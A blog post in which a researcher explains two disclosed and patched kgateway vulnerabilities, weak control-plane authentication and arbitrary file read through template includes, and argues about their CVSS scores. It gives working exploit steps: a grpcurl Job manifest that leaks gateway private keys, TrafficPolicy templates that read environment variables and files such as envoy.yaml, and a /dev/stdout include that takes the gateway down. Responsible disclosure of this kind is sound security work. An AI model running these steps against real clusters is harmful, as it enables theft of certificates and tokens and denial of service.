DEV Community

Ricardo Katz
Ricardo Katz

Posted on

The kgateway vulnerabilities explained (and why I disagree on its score!)

NOTE ⚠️: This article is written purely for research and educational purposes to help improve security across the ecosystem, and represents my self-evaluation of our risk assessment process for kgateway. kgateway is an excellent Gateway API implementation, and I have great respect for the developers and their work on this project. The vulnerabilities discussed here have been responsibly disclosed and patched. Views expressed are my own and do not necessarily reflect those of my employer.

Table of Contents

Acknowledgments

Starting with acknowledgments:

  • My wife, who was very patient with me while I was spending a lot of time investigating this
  • My team, who gave me time to conduct this research and kept motivating me to help improve the open source ecosystem
  • My friends Carlos, Adolfo and James
  • Ingress NGINX maintainers (past, current) - I know those are hard times, but you rock and have maintained a critical piece for some long time
  • kgateway maintainers (especially John and Josh) who took some time to understand the problem, acknowledge and fix it.

Some context

I recently discovered 2 vulnerabilities in kgateway that have been publicly disclosed:

These findings were discovered unintentionally, while I was researching how to extend and use kgateway for a personal idea.

For those unfamiliar, kgateway is a CNCF incubated project that implements a Kubernetes Gateway API controller, and is one of many implementations backed by Envoy Proxy.

Additionally, the project is leaning towards supporting its own proxy implementation called agentgateway, more focused on AI traffic and implemented in Rust.

Why Envoy-based Implementations?

One of the most appealing features of Envoy is its capability of dynamic configuration based on a Control Plane/Data plane architecture.

This architecture allows a single controller to reconcile all Gateway API resources and generate a configuration that is exposed on a network endpoint via Envoy's well-known API using a Go library provided by Envoy. An Envoy proxy can then connect to this control plane endpoint and fetch its own configuration.

This makes it much easier for implementations to separate the concerns between the control plane, that will connect to a Kubernetes cluster to watch and reconcile resources, and the dataplane, that should never have direct access to Kubernetes API server, and also helps avoiding problems we had in the past with Ingress NGINX and its nginx.conf generation based on templates.

An example scenario of Gateway API deployment with Envoy-based implementations is shown below, where the controller is in one namespace, a Gateway is created in an infrastructure namespace, and the user application is in a different namespace.


The weak authentication problem

This is related to GHSA-4766-x535-jw3r / CVE-2025-64323

During my research, one of my goals was to attach my own proxy to kgateway, to see if I could rely on its reconciliation logic while using a custom backend. This is actually supported.

I realized that the kgateway control plane was exposed to proxies via the kgateway service in the kgateway-system namespace, on port 9977.

My starting point was to figure out if I could use grpcurl to fetch the configuration directly from the kgateway control plane. After consulting ChatGPT for the correct syntax, I arrived at something like this (note: the command is incomplete):

grpcurl -plaintext  kgateway.kgateway-system:9977 \
   envoy.service.discovery.v3.AggregatedDiscoveryService/StreamAggregatedResources
Enter fullscreen mode Exit fullscreen mode

This service can be used to stream configurations to Envoy, but you need to specify which type you want (Listener? Routes?).

Also, an Envoy proxy needs to pass to the control plane what are its metadata, so the control plane can decide which configuration to send. kgateway used this metadata as an authentication mechanism.

Note: agentgateway used a similar way to get its configuration from kgateway control plane. The main difference is that agentgateway relies on a much smaller model.

After some investigation, I discovered that by passing the right data, the control plane would return the requested configuration:

{
  "node": {
    "id": "$GATEWAY_POD.$GATEWAY_NAMESPACE",
    "cluster": "$GATEWAY_NAME.$GATEWAY_NAMESPACE",
    "metadata": {
      "role": "kgateway-kube-gateway-api~$GATEWAY_NAMESPACE~$GATEWAY_NAME"
    }
  },
  "typeUrl": "$ENVOY_TYPE"
}
Enter fullscreen mode Exit fullscreen mode

The request requires these replacements:

  • $GATEWAY_NAME and $GATEWAY_NAMESPACE are the Gateway resource details. Users with permission to create an HTTPRoute would already have this information (required for the parentRef field)
  • $GATEWAY_POD is the actual pod name of the Envoy proxy. This is the only piece of information that might be challenging to obtain, which led to discovering the other vulnerability
  • $ENVOY_TYPE is the type of configuration to stream. Common types include:
type.googleapis.com/envoy.config.listener.v3.Listener #<- This contains certificates!
type.googleapis.com/envoy.config.route.v3.RouteConfiguration
type.googleapis.com/envoy.config.cluster.v3.Cluster
type.googleapis.com/envoy.config.endpoint.v3.ClusterLoadAssignment
type.googleapis.com/envoy.extensions.transport_sockets.tls.v3.Secret
type.googleapis.com/envoy.config.listener.v3.FilterChain
Enter fullscreen mode Exit fullscreen mode

Since the only additional information needed for authentication is the Gateway Pod name, once obtained, an attacker can create a Pod/Job with the manifest below to expose gateway certificates (which they should not have access to, as certificates are managed by the Gateway owner). In this example, I've replaced GATEWAY_NAME, GATEWAY_NAMESPACE, GATEWAY_POD, and ENVOY_TYPE with the appropriate values:

apiVersion: batch/v1
kind: Job
metadata:
  name: leak
  namespace: unprivileged
spec:
  backoffLimit: 0
  template:
    spec:
      restartPolicy: Never
      containers:
      - name: grpcurl-runner
        image: mirror.gcr.io/fedora:43
        command: ["/bin/bash", "-c"]
        args:
          - |
            set -e
            rpm -Uvh https://github.com/fullstorydev/grpcurl/releases/download/v1.9.3/grpcurl_1.9.3_linux_amd64.rpm
            cat > /script.sh <<'EOF'
            #!/bin/bash
            until [ -s /output.txt ]; do
            sleep 1
            grpcurl -plaintext -d '{"node": {"id": "gateway-678d4cf544-h9bs2.infra","cluster": "gateway.infra","metadata": {"role": "kgateway-kube-gateway-api~infra~gateway"}},"typeUrl": "type.googleapis.com/envoy.config.listener.v3.Listener"}' kgateway.kgateway-system:9977 envoy.service.discovery.v3.AggregatedDiscoveryService/StreamAggregatedResources > /output.txt
            done
            cat /output.txt
            EOF
            chmod +x /script.sh
            /script.sh
Enter fullscreen mode Exit fullscreen mode

And checking the logs of this Job:

"privateKey": {
   "inlineBytes": "CERTIFICATE_PRIVATE_KEY"
}
Enter fullscreen mode Exit fullscreen mode

Getting the Pod name

Discovering the Pod name was required to be able to authenticate. kgateway contains a Custom Resource called TrafficPolicy that allows a user to apply policies like rate limit, authentication, etc.

The problem with TrafficPolicy is that it allows some transformations to add headers to requests and responses, and these transformations can be based on templates, but also allow reading the Proxy environment variables.

This feature can be legitimately used to expose variables related to availability zones of a proxy, but it can also be used to read environment variables that contain the HOSTNAME, which is the Pod name.

For example, a user could create the following resources in their unprivileged namespace:

apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: my-app
spec:
  hostnames:
  - app.tld
  parentRefs:
  - group: gateway.networking.k8s.io
    kind: Gateway
    name: gateway
    namespace: infra
  rules:
  - backendRefs:
    - group: ""
      kind: Service
      name: my-app
      port: 80
      weight: 1
    matches:
    - path:
        type: PathPrefix
        value: /
---
apiVersion: gateway.kgateway.dev/v1alpha1
kind: TrafficPolicy
metadata:
  name: transformation
  namespace: unprivileged
spec:
  targetRefs:
  - group: gateway.networking.k8s.io
    kind: HTTPRoute
    name: my-app
  transformation:
    response:
      add:
      - name: pod-name
        value: '{{ env("HOSTNAME") }}'
Enter fullscreen mode Exit fullscreen mode

A simple cURL request to the app is sufficient to retrieve the Gateway pod name:

$ curl --output /dev/null -I -s -w '%header{pod-name}' http://app.tld
gateway-678d4cf544-h9bs2
Enter fullscreen mode Exit fullscreen mode

The pod name can then be used to exploit the weak authentication vulnerability.

About the score of this vulnerability

Given that:

  • The vulnerability requires authenticated Kubernetes cluster access with permissions to create HTTPRoute and TrafficPolicy resources, meaning Network Attack Vector (AV:N) and Low Privileges required (PR:L)
  • The Attack complexity is low (AC:L)
  • The Confidentiality impact is high (C:H)

Based on these factors, the CVSS score for this vulnerability is 6.5, which classifies it as "Medium" severity.

Note: While access to TrafficPolicy and HTTPRoute should be restricted through proper RBAC policies, the low barrier to exploitation for users with these permissions remains a significant security concern.


The arbitrary file read problem

This is related to GHSA-5pmx-7r6r-wfqq

While trying to figure out a way to expose the Pod name, I noticed that the kgateway documentation states that "templates are powered by v3.4 of the Inja template engine".

I decided to investigate what other capabilities Inja offered.

Inja allows including other files as templates, so I decided to test this feature by modifying my TrafficPolicy:

apiVersion: gateway.kgateway.dev/v1alpha1
kind: TrafficPolicy
metadata:
  name: transformation
  namespace: unprivileged
spec:
  targetRefs:
  - group: gateway.networking.k8s.io
    kind: HTTPRoute
    name: my-app
  transformation:
    response:
      body:
        parseAs: AsString
        value: '{% include "/etc/envoy/envoy.yaml" %}'
Enter fullscreen mode Exit fullscreen mode

And now, when I call my app with curl http://app.tld I get the full envoy configuration.

At first, someone might think to extract the Kubernetes service account from /var/run/secrets/kubernetes.io/serviceaccount/token, but kgateway implements good security practices by not mounting Kubernetes service account tokens on the proxies.

However, an attacker could still read /proc/1/cmdline to see how Envoy is started and potentially obtain credentials for the control plane.

The authentication for the Weak Authentication issue was added as part of this PR and now we can see that this new token is mounted at /var/run/secrets/tokens/xds-token.

Since these are two separate vulnerabilities, if the file injection issue had been discovered after the weak authentication fix was deployed, an attacker could still read the authentication token and fetch configurations from the control plane.

Another concern is that an attacker could set the include path to /dev/stdout, which blocks all Envoy reads and makes the Gateway unavailable, creating both a confidentiality and availability issue.

About the score of this vulnerability

Given that:

  • The vulnerability requires authenticated Kubernetes cluster access with permissions to create HTTPRoute and TrafficPolicy resources, meaning Network Attack Vector (AV:N) and Low Privileges required (PR:L)
  • The Attack complexity is low (AC:L)
  • The Confidentiality impact is high (C:H)
  • The Availability impact is high (A:H)

Based on these factors, the CVSS score for this vulnerability is 8.1, which classifies it as "High" severity.


Best Practices for Security

Recommended steps to help reduce the risks of discovered (and undiscovered) vulnerabilities:

  • Always upgrade - Apply security updates regardless of whether vulnerabilities are tagged as "Low" or "Medium".
  • Implement least privilege - Limit user access to only the resources they need. If users don't require access to resources like TrafficPolicy, don't grant it. If they do, ensure proper auditing is in place.
  • Use Network Policies - While kgateway manages part of the Gateway lifecycle, you can still create NetworkPolicies to restrict control plane access to only Gateways in trusted namespaces.

Top comments (0)